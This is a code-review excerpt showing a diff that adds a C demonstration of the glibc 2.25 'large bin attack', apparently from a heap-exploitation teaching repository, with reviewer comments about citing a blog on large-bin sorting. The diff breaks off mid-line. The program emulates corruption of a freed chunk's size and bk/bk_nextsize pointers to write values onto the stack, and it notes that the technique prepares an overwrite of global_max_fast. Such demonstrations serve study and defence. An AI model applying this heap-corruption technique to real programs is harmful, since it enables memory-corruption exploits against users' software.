glibc_2.25/large_bin_attack.c

```diff
@@ -0,0 +1,104 @@
+                  victim->bk_nextsize->fd_nextsize = victim;
+              }
+              bck = fwd->bk;
+
+    [...]
+
+    mark_bin (av, victim_index);
+    victim->bk = bck;
+    victim->fd = fwd;
+    fwd->bk = victim;
+    bck->fd = victim;
+
+    [...]
+
+ */
+
+#include<stdio.h>
+#include<stdlib.h>
+ 
+int main()
+{
+    fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n");
+    fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the "
+           "global variable global_max_fast in libc for further fastbin attack\n\n");
+
+    unsigned long stack_var1 = 0;
+    unsigned long stack_var2 = 0;
+
+    fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n");
+    fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
+    fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
+
+    unsigned long *p1 = malloc(0x320);
+    fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", p1 - 2);
+
+    fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
+           " the first large chunk during the free()\n\n");
+    malloc(0x20);
+
+    unsigned long *p2 = malloc(0x400);
+    fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", p2 - 2);
+
+    fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
+           " the second large chunk during the free()\n\n");
+    malloc(0x20);
+
+    unsigned long *p3 = malloc(0x400);
+    fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", p3 - 2);
+ 
+    fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with"
+           " the third large chunk during the free()\n\n");
+    malloc(0x20);
+ 
+    free(p1);
+    free(p2);
+    fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:"
+           " %p --> %p\n\n", (void *)(p2 - 2), (void *)(p1 - 2));
+
+    malloc(0x90);
+    fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the"
+            " freed second large chunk into the large bin freelist, use parts of the freed first large chunk for allocation"
+            ", and reinsert the remaining of the freed first large chunk into the unsorted bin:"
+            " %p\n\n", (void *)((char *)p1 + 0x90));
+
+    free(p3);
+ 
+    //------------VULNERABILITY-----------
+
+    fprintf(stderr, "Now emulating a vulnerability that can overwrite the freed second large chunk's \"size\""
+            " as well as its \"bk\" and \"bk_nextsize\" pointers\n");
+    fprintf(stderr, "Basically, we decrease the size of the freed second large chunk to force malloc to insert the freed third large chunk"
```

Comment:
Please add a reference to the Background section of https://dangokyo.me/2018/04/07/a-revisit-to-large-bin-in-glibc/ as further reference that explains how large-bins are sorted in the glibc

Reply:
I am not sure whether I understood. I don't have a write access to that blog. Shall I add an extra link to the beginning of the large_bin_attack.c?

Reply:
*which explains how large bins are sorted.

Reply:
I just meant smth. like: "For further reference on how large-bins are handled by ptmalloc check the Background section in https://dangokyo.me/2018/04/07/a-revisit-to-large-bin-in-glibc/"